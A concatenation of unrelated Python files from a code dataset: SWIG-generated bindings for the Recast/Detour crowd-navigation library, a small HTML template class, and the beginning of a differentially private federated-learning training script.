DT_CROWD_ANTICIPATE_TURNS = _pyrecast.DT_CROWD_ANTICIPATE_TURNS
DT_CROWD_OBSTACLE_AVOIDANCE = _pyrecast.DT_CROWD_OBSTACLE_AVOIDANCE
DT_CROWD_SEPARATION = _pyrecast.DT_CROWD_SEPARATION
DT_CROWD_OPTIMIZE_VIS = _pyrecast.DT_CROWD_OPTIMIZE_VIS
DT_CROWD_OPTIMIZE_TOPO = _pyrecast.DT_CROWD_OPTIMIZE_TOPO
class dtCrowdAgentDebugInfo(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowdAgentDebugInfo, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtCrowdAgentDebugInfo, name)
__repr__ = _swig_repr
__swig_setmethods__["idx"] = _pyrecast.dtCrowdAgentDebugInfo_idx_set
__swig_getmethods__["idx"] = _pyrecast.dtCrowdAgentDebugInfo_idx_get
if _newclass:idx = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_idx_get, _pyrecast.dtCrowdAgentDebugInfo_idx_set)
__swig_setmethods__["optStart"] = _pyrecast.dtCrowdAgentDebugInfo_optStart_set
__swig_getmethods__["optStart"] = _pyrecast.dtCrowdAgentDebugInfo_optStart_get
if _newclass:optStart = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_optStart_get, _pyrecast.dtCrowdAgentDebugInfo_optStart_set)
__swig_setmethods__["optEnd"] = _pyrecast.dtCrowdAgentDebugInfo_optEnd_set
__swig_getmethods__["optEnd"] = _pyrecast.dtCrowdAgentDebugInfo_optEnd_get
if _newclass:optEnd = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_optEnd_get, _pyrecast.dtCrowdAgentDebugInfo_optEnd_set)
__swig_setmethods__["vod"] = _pyrecast.dtCrowdAgentDebugInfo_vod_set
__swig_getmethods__["vod"] = _pyrecast.dtCrowdAgentDebugInfo_vod_get
if _newclass:vod = _swig_property(_pyrecast.dtCrowdAgentDebugInfo_vod_get, _pyrecast.dtCrowdAgentDebugInfo_vod_set)
def __init__(self):
this = _pyrecast.new_dtCrowdAgentDebugInfo()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtCrowdAgentDebugInfo
__del__ = lambda self : None;
dtCrowdAgentDebugInfo_swigregister = _pyrecast.dtCrowdAgentDebugInfo_swigregister
dtCrowdAgentDebugInfo_swigregister(dtCrowdAgentDebugInfo)
class dtCrowd(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtCrowd, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtCrowd, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtCrowd()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtCrowd
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtCrowd_init(self, *args)
def setObstacleAvoidanceParams(self, *args): return _pyrecast.dtCrowd_setObstacleAvoidanceParams(self, *args)
def getObstacleAvoidanceParams(self, *args): return _pyrecast.dtCrowd_getObstacleAvoidanceParams(self, *args)
def getAgent(self, *args): return _pyrecast.dtCrowd_getAgent(self, *args)
def getAgentCount(self): return _pyrecast.dtCrowd_getAgentCount(self)
def addAgent(self, *args): return _pyrecast.dtCrowd_addAgent(self, *args)
def updateAgentParameters(self, *args): return _pyrecast.dtCrowd_updateAgentParameters(self, *args)
def removeAgent(self, *args): return _pyrecast.dtCrowd_removeAgent(self, *args)
def requestMoveTarget(self, *args): return _pyrecast.dtCrowd_requestMoveTarget(self, *args)
def requestMoveVelocity(self, *args): return _pyrecast.dtCrowd_requestMoveVelocity(self, *args)
def resetMoveTarget(self, *args): return _pyrecast.dtCrowd_resetMoveTarget(self, *args)
def getActiveAgents(self, *args): return _pyrecast.dtCrowd_getActiveAgents(self, *args)
def update(self, *args): return _pyrecast.dtCrowd_update(self, *args)
def getFilter(self): return _pyrecast.dtCrowd_getFilter(self)
def getEditableFilter(self): return _pyrecast.dtCrowd_getEditableFilter(self)
def getQueryExtents(self): return _pyrecast.dtCrowd_getQueryExtents(self)
def getVelocitySampleCount(self): return _pyrecast.dtCrowd_getVelocitySampleCount(self)
def getGrid(self): return _pyrecast.dtCrowd_getGrid(self)
def getPathQueue(self): return _pyrecast.dtCrowd_getPathQueue(self)
def getNavMeshQuery(self): return _pyrecast.dtCrowd_getNavMeshQuery(self)
dtCrowd_swigregister = _pyrecast.dtCrowd_swigregister
dtCrowd_swigregister(dtCrowd)
def dtAllocCrowd():
return _pyrecast.dtAllocCrowd()
dtAllocCrowd = _pyrecast.dtAllocCrowd
def dtFreeCrowd(*args):
return _pyrecast.dtFreeCrowd(*args)
dtFreeCrowd = _pyrecast.dtFreeCrowd
class dtLocalBoundary(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtLocalBoundary, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtLocalBoundary, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtLocalBoundary()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtLocalBoundary
__del__ = lambda self : None;
def reset(self): return _pyrecast.dtLocalBoundary_reset(self)
def update(self, *args): return _pyrecast.dtLocalBoundary_update(self, *args)
def isValid(self, *args): return _pyrecast.dtLocalBoundary_isValid(self, *args)
def getCenter(self): return _pyrecast.dtLocalBoundary_getCenter(self)
def getSegmentCount(self): return _pyrecast.dtLocalBoundary_getSegmentCount(self)
def getSegment(self, *args): return _pyrecast.dtLocalBoundary_getSegment(self, *args)
dtLocalBoundary_swigregister = _pyrecast.dtLocalBoundary_swigregister
dtLocalBoundary_swigregister(dtLocalBoundary)
class dtObstacleCircle(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleCircle, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtObstacleCircle, name)
__repr__ = _swig_repr
__swig_setmethods__["p"] = _pyrecast.dtObstacleCircle_p_set
__swig_getmethods__["p"] = _pyrecast.dtObstacleCircle_p_get
if _newclass:p = _swig_property(_pyrecast.dtObstacleCircle_p_get, _pyrecast.dtObstacleCircle_p_set)
__swig_setmethods__["vel"] = _pyrecast.dtObstacleCircle_vel_set
__swig_getmethods__["vel"] = _pyrecast.dtObstacleCircle_vel_get
if _newclass:vel = _swig_property(_pyrecast.dtObstacleCircle_vel_get, _pyrecast.dtObstacleCircle_vel_set)
__swig_setmethods__["dvel"] = _pyrecast.dtObstacleCircle_dvel_set
__swig_getmethods__["dvel"] = _pyrecast.dtObstacleCircle_dvel_get
if _newclass:dvel = _swig_property(_pyrecast.dtObstacleCircle_dvel_get, _pyrecast.dtObstacleCircle_dvel_set)
__swig_setmethods__["rad"] = _pyrecast.dtObstacleCircle_rad_set
__swig_getmethods__["rad"] = _pyrecast.dtObstacleCircle_rad_get
if _newclass:rad = _swig_property(_pyrecast.dtObstacleCircle_rad_get, _pyrecast.dtObstacleCircle_rad_set)
__swig_setmethods__["dp"] = _pyrecast.dtObstacleCircle_dp_set
__swig_getmethods__["dp"] = _pyrecast.dtObstacleCircle_dp_get
if _newclass:dp = _swig_property(_pyrecast.dtObstacleCircle_dp_get, _pyrecast.dtObstacleCircle_dp_set)
__swig_setmethods__["np"] = _pyrecast.dtObstacleCircle_np_set
__swig_getmethods__["np"] = _pyrecast.dtObstacleCircle_np_get
if _newclass:np = _swig_property(_pyrecast.dtObstacleCircle_np_get, _pyrecast.dtObstacleCircle_np_set)
def __init__(self):
this = _pyrecast.new_dtObstacleCircle()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtObstacleCircle
__del__ = lambda self : None;
dtObstacleCircle_swigregister = _pyrecast.dtObstacleCircle_swigregister
dtObstacleCircle_swigregister(dtObstacleCircle)
class dtObstacleSegment(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleSegment, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtObstacleSegment, name)
__repr__ = _swig_repr
__swig_setmethods__["p"] = _pyrecast.dtObstacleSegment_p_set
__swig_getmethods__["p"] = _pyrecast.dtObstacleSegment_p_get
if _newclass:p = _swig_property(_pyrecast.dtObstacleSegment_p_get, _pyrecast.dtObstacleSegment_p_set)
__swig_setmethods__["q"] = _pyrecast.dtObstacleSegment_q_set
__swig_getmethods__["q"] = _pyrecast.dtObstacleSegment_q_get
if _newclass:q = _swig_property(_pyrecast.dtObstacleSegment_q_get, _pyrecast.dtObstacleSegment_q_set)
__swig_setmethods__["touch"] = _pyrecast.dtObstacleSegment_touch_set
__swig_getmethods__["touch"] = _pyrecast.dtObstacleSegment_touch_get
if _newclass:touch = _swig_property(_pyrecast.dtObstacleSegment_touch_get, _pyrecast.dtObstacleSegment_touch_set)
def __init__(self):
this = _pyrecast.new_dtObstacleSegment()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtObstacleSegment
__del__ = lambda self : None;
dtObstacleSegment_swigregister = _pyrecast.dtObstacleSegment_swigregister
dtObstacleSegment_swigregister(dtObstacleSegment)
class dtObstacleAvoidanceDebugData(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleAvoidanceDebugData, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtObstacleAvoidanceDebugData, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtObstacleAvoidanceDebugData()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtObstacleAvoidanceDebugData
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_init(self, *args)
def reset(self): return _pyrecast.dtObstacleAvoidanceDebugData_reset(self)
def addSample(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_addSample(self, *args)
def normalizeSamples(self): return _pyrecast.dtObstacleAvoidanceDebugData_normalizeSamples(self)
def getSampleCount(self): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleCount(self)
def getSampleVelocity(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleVelocity(self, *args)
def getSampleSize(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleSize(self, *args)
def getSamplePenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSamplePenalty(self, *args)
def getSampleDesiredVelocityPenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleDesiredVelocityPenalty(self, *args)
def getSampleCurrentVelocityPenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleCurrentVelocityPenalty(self, *args)
def getSamplePreferredSidePenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSamplePreferredSidePenalty(self, *args)
def getSampleCollisionTimePenalty(self, *args): return _pyrecast.dtObstacleAvoidanceDebugData_getSampleCollisionTimePenalty(self, *args)
dtObstacleAvoidanceDebugData_swigregister = _pyrecast.dtObstacleAvoidanceDebugData_swigregister
dtObstacleAvoidanceDebugData_swigregister(dtObstacleAvoidanceDebugData)
def dtAllocObstacleAvoidanceDebugData():
return _pyrecast.dtAllocObstacleAvoidanceDebugData()
dtAllocObstacleAvoidanceDebugData = _pyrecast.dtAllocObstacleAvoidanceDebugData
def dtFreeObstacleAvoidanceDebugData(*args):
return _pyrecast.dtFreeObstacleAvoidanceDebugData(*args)
dtFreeObstacleAvoidanceDebugData = _pyrecast.dtFreeObstacleAvoidanceDebugData
class dtObstacleAvoidanceParams(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleAvoidanceParams, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtObstacleAvoidanceParams, name)
__repr__ = _swig_repr
__swig_setmethods__["velBias"] = _pyrecast.dtObstacleAvoidanceParams_velBias_set
__swig_getmethods__["velBias"] = _pyrecast.dtObstacleAvoidanceParams_velBias_get
if _newclass:velBias = _swig_property(_pyrecast.dtObstacleAvoidanceParams_velBias_get, _pyrecast.dtObstacleAvoidanceParams_velBias_set)
__swig_setmethods__["weightDesVel"] = _pyrecast.dtObstacleAvoidanceParams_weightDesVel_set
__swig_getmethods__["weightDesVel"] = _pyrecast.dtObstacleAvoidanceParams_weightDesVel_get
if _newclass:weightDesVel = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightDesVel_get, _pyrecast.dtObstacleAvoidanceParams_weightDesVel_set)
__swig_setmethods__["weightCurVel"] = _pyrecast.dtObstacleAvoidanceParams_weightCurVel_set
__swig_getmethods__["weightCurVel"] = _pyrecast.dtObstacleAvoidanceParams_weightCurVel_get
if _newclass:weightCurVel = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightCurVel_get, _pyrecast.dtObstacleAvoidanceParams_weightCurVel_set)
__swig_setmethods__["weightSide"] = _pyrecast.dtObstacleAvoidanceParams_weightSide_set
__swig_getmethods__["weightSide"] = _pyrecast.dtObstacleAvoidanceParams_weightSide_get
if _newclass:weightSide = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightSide_get, _pyrecast.dtObstacleAvoidanceParams_weightSide_set)
__swig_setmethods__["weightToi"] = _pyrecast.dtObstacleAvoidanceParams_weightToi_set
__swig_getmethods__["weightToi"] = _pyrecast.dtObstacleAvoidanceParams_weightToi_get
if _newclass:weightToi = _swig_property(_pyrecast.dtObstacleAvoidanceParams_weightToi_get, _pyrecast.dtObstacleAvoidanceParams_weightToi_set)
__swig_setmethods__["horizTime"] = _pyrecast.dtObstacleAvoidanceParams_horizTime_set
__swig_getmethods__["horizTime"] = _pyrecast.dtObstacleAvoidanceParams_horizTime_get
if _newclass:horizTime = _swig_property(_pyrecast.dtObstacleAvoidanceParams_horizTime_get, _pyrecast.dtObstacleAvoidanceParams_horizTime_set)
__swig_setmethods__["gridSize"] = _pyrecast.dtObstacleAvoidanceParams_gridSize_set
__swig_getmethods__["gridSize"] = _pyrecast.dtObstacleAvoidanceParams_gridSize_get
if _newclass:gridSize = _swig_property(_pyrecast.dtObstacleAvoidanceParams_gridSize_get, _pyrecast.dtObstacleAvoidanceParams_gridSize_set)
__swig_setmethods__["adaptiveDivs"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_set
__swig_getmethods__["adaptiveDivs"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_get
if _newclass:adaptiveDivs = _swig_property(_pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_get, _pyrecast.dtObstacleAvoidanceParams_adaptiveDivs_set)
__swig_setmethods__["adaptiveRings"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveRings_set
__swig_getmethods__["adaptiveRings"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveRings_get
if _newclass:adaptiveRings = _swig_property(_pyrecast.dtObstacleAvoidanceParams_adaptiveRings_get, _pyrecast.dtObstacleAvoidanceParams_adaptiveRings_set)
__swig_setmethods__["adaptiveDepth"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_set
__swig_getmethods__["adaptiveDepth"] = _pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_get
if _newclass:adaptiveDepth = _swig_property(_pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_get, _pyrecast.dtObstacleAvoidanceParams_adaptiveDepth_set)
def __init__(self):
this = _pyrecast.new_dtObstacleAvoidanceParams()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtObstacleAvoidanceParams
__del__ = lambda self : None;
dtObstacleAvoidanceParams_swigregister = _pyrecast.dtObstacleAvoidanceParams_swigregister
dtObstacleAvoidanceParams_swigregister(dtObstacleAvoidanceParams)
DT_MAX_PATTERN_DIVS = cvar.DT_MAX_PATTERN_DIVS
DT_MAX_PATTERN_RINGS = cvar.DT_MAX_PATTERN_RINGS
class dtObstacleAvoidanceQuery(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtObstacleAvoidanceQuery, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtObstacleAvoidanceQuery, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtObstacleAvoidanceQuery()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtObstacleAvoidanceQuery
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_init(self, *args)
def reset(self): return _pyrecast.dtObstacleAvoidanceQuery_reset(self)
def addCircle(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_addCircle(self, *args)
def addSegment(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_addSegment(self, *args)
def sampleVelocityGrid(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_sampleVelocityGrid(self, *args)
def sampleVelocityAdaptive(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_sampleVelocityAdaptive(self, *args)
def getObstacleCircleCount(self): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleCircleCount(self)
def getObstacleCircle(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleCircle(self, *args)
def getObstacleSegmentCount(self): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleSegmentCount(self)
def getObstacleSegment(self, *args): return _pyrecast.dtObstacleAvoidanceQuery_getObstacleSegment(self, *args)
dtObstacleAvoidanceQuery_swigregister = _pyrecast.dtObstacleAvoidanceQuery_swigregister
dtObstacleAvoidanceQuery_swigregister(dtObstacleAvoidanceQuery)
def dtAllocObstacleAvoidanceQuery():
return _pyrecast.dtAllocObstacleAvoidanceQuery()
dtAllocObstacleAvoidanceQuery = _pyrecast.dtAllocObstacleAvoidanceQuery
def dtFreeObstacleAvoidanceQuery(*args):
return _pyrecast.dtFreeObstacleAvoidanceQuery(*args)
dtFreeObstacleAvoidanceQuery = _pyrecast.dtFreeObstacleAvoidanceQuery
class dtPathCorridor(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtPathCorridor, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtPathCorridor, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtPathCorridor()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtPathCorridor
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtPathCorridor_init(self, *args)
def reset(self, *args): return _pyrecast.dtPathCorridor_reset(self, *args)
def findCorners(self, *args): return _pyrecast.dtPathCorridor_findCorners(self, *args)
def optimizePathVisibility(self, *args): return _pyrecast.dtPathCorridor_optimizePathVisibility(self, *args)
def optimizePathTopology(self, *args): return _pyrecast.dtPathCorridor_optimizePathTopology(self, *args)
def moveOverOffmeshConnection(self, *args): return _pyrecast.dtPathCorridor_moveOverOffmeshConnection(self, *args)
def fixPathStart(self, *args): return _pyrecast.dtPathCorridor_fixPathStart(self, *args)
def trimInvalidPath(self, *args): return _pyrecast.dtPathCorridor_trimInvalidPath(self, *args)
def isValid(self, *args): return _pyrecast.dtPathCorridor_isValid(self, *args)
def movePosition(self, *args): return _pyrecast.dtPathCorridor_movePosition(self, *args)
def moveTargetPosition(self, *args): return _pyrecast.dtPathCorridor_moveTargetPosition(self, *args)
def setCorridor(self, *args): return _pyrecast.dtPathCorridor_setCorridor(self, *args)
def getPos(self): return _pyrecast.dtPathCorridor_getPos(self)
def getTarget(self): return _pyrecast.dtPathCorridor_getTarget(self)
def getFirstPoly(self): return _pyrecast.dtPathCorridor_getFirstPoly(self)
def getLastPoly(self): return _pyrecast.dtPathCorridor_getLastPoly(self)
def getPath(self): return _pyrecast.dtPathCorridor_getPath(self)
def getPathCount(self): return _pyrecast.dtPathCorridor_getPathCount(self)
dtPathCorridor_swigregister = _pyrecast.dtPathCorridor_swigregister
dtPathCorridor_swigregister(dtPathCorridor)
def dtMergeCorridorStartMoved(*args):
return _pyrecast.dtMergeCorridorStartMoved(*args)
dtMergeCorridorStartMoved = _pyrecast.dtMergeCorridorStartMoved
def dtMergeCorridorEndMoved(*args):
return _pyrecast.dtMergeCorridorEndMoved(*args)
dtMergeCorridorEndMoved = _pyrecast.dtMergeCorridorEndMoved
def dtMergeCorridorStartShortcut(*args):
return _pyrecast.dtMergeCorridorStartShortcut(*args)
dtMergeCorridorStartShortcut = _pyrecast.dtMergeCorridorStartShortcut
class dtPathQueue(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtPathQueue, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtPathQueue, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtPathQueue()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtPathQueue
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtPathQueue_init(self, *args)
def update(self, *args): return _pyrecast.dtPathQueue_update(self, *args)
def request(self, *args): return _pyrecast.dtPathQueue_request(self, *args)
def getRequestStatus(self, *args): return _pyrecast.dtPathQueue_getRequestStatus(self, *args)
def getPathResult(self, *args): return _pyrecast.dtPathQueue_getPathResult(self, *args)
def getNavQuery(self): return _pyrecast.dtPathQueue_getNavQuery(self)
dtPathQueue_swigregister = _pyrecast.dtPathQueue_swigregister
dtPathQueue_swigregister(dtPathQueue)
DT_PATHQ_INVALID = cvar.DT_PATHQ_INVALID
class dtProximityGrid(_object):
__swig_setmethods__ = {}
__setattr__ = lambda self, name, value: _swig_setattr(self, dtProximityGrid, name, value)
__swig_getmethods__ = {}
__getattr__ = lambda self, name: _swig_getattr(self, dtProximityGrid, name)
__repr__ = _swig_repr
def __init__(self):
this = _pyrecast.new_dtProximityGrid()
try: self.this.append(this)
except: self.this = this
__swig_destroy__ = _pyrecast.delete_dtProximityGrid
__del__ = lambda self : None;
def init(self, *args): return _pyrecast.dtProximityGrid_init(self, *args)
def clear(self): return _pyrecast.dtProximityGrid_clear(self)
def addItem(self, *args): return _pyrecast.dtProximityGrid_addItem(self, *args)
def queryItems(self, *args): return _pyrecast.dtProximityGrid_queryItems(self, *args)
def getItemCountAt(self, *args): return _pyrecast.dtProximityGrid_getItemCountAt(self, *args)
def getBounds(self): return _pyrecast.dtProximityGrid_getBounds(self)
def getCellSize(self): return _pyrecast.dtProximityGrid_getCellSize(self)
dtProximityGrid_swigregister = _pyrecast.dtProximityGrid_swigregister
dtProximityGrid_swigregister(dtProximityGrid)
def dtAllocProximityGrid():
return _pyrecast.dtAllocProximityGrid()
dtAllocProximityGrid = _pyrecast.dtAllocProximityGrid
def dtFreeProximityGrid(*args):
return _pyrecast.dtFreeProximityGrid(*args)
dtFreeProximityGrid = _pyrecast.dtFreeProximityGrid
def new_ushortp(*args):
return _pyrecast.new_ushortp(*args)
new_ushortp = _pyrecast.new_ushortp
def delete_ushortp(*args):
return _pyrecast.delete_ushortp(*args)
delete_ushortp = _pyrecast.delete_ushortp
def ushortp_getitem(*args):
return _pyrecast.ushortp_getitem(*args)
ushortp_getitem = _pyrecast.ushortp_getitem
def ushortp_setitem(*args):
return _pyrecast.ushortp_setitem(*args)
ushortp_setitem = _pyrecast.ushortp_setitem
def new_ucharp(*args):
return _pyrecast.new_ucharp(*args)
new_ucharp = _pyrecast.new_ucharp
def delete_ucharp(*args):
return _pyrecast.delete_ucharp(*args)
delete_ucharp = _pyrecast.delete_ucharp
def ucharp_getitem(*args):
return _pyrecast.ucharp_getitem(*args)
ucharp_getitem = _pyrecast.ucharp_getitem
def ucharp_setitem(*args):
return _pyrecast.ucharp_setitem(*args)
ucharp_setitem = _pyrecast.ucharp_setitem
def new_uintp(*args):
return _pyrecast.new_uintp(*args)
new_uintp = _pyrecast.new_uintp
def delete_uintp(*args):
return _pyrecast.delete_uintp(*args)
delete_uintp = _pyrecast.delete_uintp
def uintp_getitem(*args):
return _pyrecast.uintp_getitem(*args)
uintp_getitem = _pyrecast.uintp_getitem
def uintp_setitem(*args):
return _pyrecast.uintp_setitem(*args)
uintp_setitem = _pyrecast.uintp_setitem
def new_intp(*args):
return _pyrecast.new_intp(*args)
new_intp = _pyrecast.new_intp
def delete_intp(*args):
return _pyrecast.delete_intp(*args)
delete_intp = _pyrecast.delete_intp
def intp_getitem(*args):
return _pyrecast.intp_getitem(*args)
intp_getitem = _pyrecast.intp_getitem
def intp_setitem(*args):
return _pyrecast.intp_setitem(*args)
intp_setitem = _pyrecast.intp_setitem
def new_floatp(*args):
return _pyrecast.new_floatp(*args)
new_floatp = _pyrecast.new_floatp
def delete_floatp(*args):
return _pyrecast.delete_floatp(*args)
delete_floatp = _pyrecast.delete_floatp
def floatp_getitem(*args):
return _pyrecast.floatp_getitem(*args)
floatp_getitem = _pyrecast.floatp_getitem
def floatp_setitem(*args):
return _pyrecast.floatp_setitem(*args)
floatp_setitem = _pyrecast.floatp_setitem
# This file is compatible with both classic and new-style classes.
| 60.407497 | 167 | 0.815041 |
e5cad4e4204fa021d670502ddc4dc4cbeb04e7a2 | 196 | py | Python | Pi-Web_Example/server/html_template.py | tmly115/Pi-Web-Example-Site | 7d2213ca057522345b52c4c250e20300aff1bf32 | [
"Apache-2.0"
] | null | null | null | Pi-Web_Example/server/html_template.py | tmly115/Pi-Web-Example-Site | 7d2213ca057522345b52c4c250e20300aff1bf32 | [
"Apache-2.0"
] | null | null | null | Pi-Web_Example/server/html_template.py | tmly115/Pi-Web-Example-Site | 7d2213ca057522345b52c4c250e20300aff1bf32 | [
"Apache-2.0"
] | null | null | null |
class HTML_Template:
def __init__(self, template_path):
template_file = open(template_path, 'r')
self.html = template_file.read()
def generate_html(self):
return self.html | 16.333333 | 43 | 0.693878 |
833bd2faa9769a377a4dd3945e61b22dfd55e226 | 33,954 | py | Python | DiffPrivate_FedLearning.py | chaomeng-chen/PFAT | 64d0da9693e91a20cfdfa50e322b098ffd58ce4e | [
"Apache-2.0"
] | null | null | null | DiffPrivate_FedLearning.py | chaomeng-chen/PFAT | 64d0da9693e91a20cfdfa50e322b098ffd58ce4e | [
"Apache-2.0"
] | null | null | null | DiffPrivate_FedLearning.py | chaomeng-chen/PFAT | 64d0da9693e91a20cfdfa50e322b098ffd58ce4e | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from concurrent.futures import ThreadPoolExecutor, wait, ALL_COMPLETED, FIRST_COMPLETED,as_completed
import threading
import time
import numpy as np
import tensorflow as tf
import math
import random
import copy
from Helper_Functions import Vname_to_FeedPname, Vname_to_Pname, check_validaity_of_FLAGS, create_save_dir, \
global_step_creator, load_from_directory_or_initialize, bring_Accountant_up_to_date, save_progress, \
save_progress_K_model, load_from_directory_or_initialize_K_model, WeightsAccountant, print_loss_and_accuracy, \
print_new_comm_round, PrivAgent, Flag
from compute_dp_sgd_privacy_lib import compute_dp_sgd_privacy
from compute_noise_from_budget_lib import compute_noise
# model_num
# MODEL_NUM=9
lock=threading.Lock() #申请一把锁
finished_thread_Count=0
def Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
increase_global_step, FLAGS,data_placeholder,label_placeholder,data_set_asarray,label_set_asarray,
s, c, train_op, real_round, acc):
with sess.as_default():
with sess.graph.as_default():
choose_model = random.randrange(FLAGS.MODEL_NUM)
data_ind = np.split(np.asarray(participating_clients[c]), FLAGS.b, 0)
replaceModel = random.randrange(FLAGS.MODEL_NUM)
clients_epoch[replaceModel][s[c]] = clients_epoch[choose_model][s[c]] + FLAGS.e
# print('user: {} start'.format(c))
if FLAGS.method==0:
target_sigma = 1.5/FLAGS.b*((clients_epoch[replaceModel][s[c]]*FLAGS.b*math.log(1e3))**0.5)/FLAGS.THV
# target_sigma = compute_noise(participating_clients[c].shape[0],
# participating_clients[c].shape[0] / FLAGS.b, 1,
# clients_epoch[replaceModel][s[c]], 1e-3, 1e-6, c)
else:
target_sigma = 0
# lock.acquire() # 加锁
sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
# print(tf.trainable_variables())
for e in range(int(FLAGS.e)):
for step in range(len(data_ind)):
real_step = sess.run(increase_global_step)
batch_ind = data_ind[step]
feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j) for j in batch_ind]],
str(label_placeholder.name): label_set_asarray[[int(j) for j in batch_ind]]}
_ = sess.run([train_op], feed_dict=feed_dict)
weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round,
participating_clients[c].shape[0] * FLAGS.e)
newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
model[replaceModel] = newModel
model[replaceModel]['global_step_placeholder:0'] = real_step
# lock.acquire() # 加锁
global finished_thread_Count
finished_thread_Count= finished_thread_Count + 1
# lock.release()
# print('user: {} finish'.format(c))
return
def run_differentially_private_federated_averaging(loss, train_op, eval_correct, data, data_placeholder,
label_placeholder, privacy_agent=None, b=10, e=4,
record_privacy=True, m=0, sigma=0, eps=8, save_dir=None,
log_dir=None, max_comm_rounds=3000, gm=True,
saver_func=create_save_dir, save_params=False, MODEL_NUM=10,
THV=1, C=0.01, method=0, isTest=False):
"""
This function will simulate a federated learning setting and enable differential privacy tracking. It will detect
all trainable tensorflow variables in the tensorflow graph and simulate a decentralized learning process where these
variables are learned through clients that only have access to their own data set.
This function must therefore be run inside a Graph as follows:
--------------------------------------------------------------------------------------------------------------------
with tf.Graph().as_default():
train_op, eval_correct, loss, data_placeholder, labels_placeholder = Some_function_that_builds_TF_graph()
Accuracy_accountant, Delta_accountant, model = \
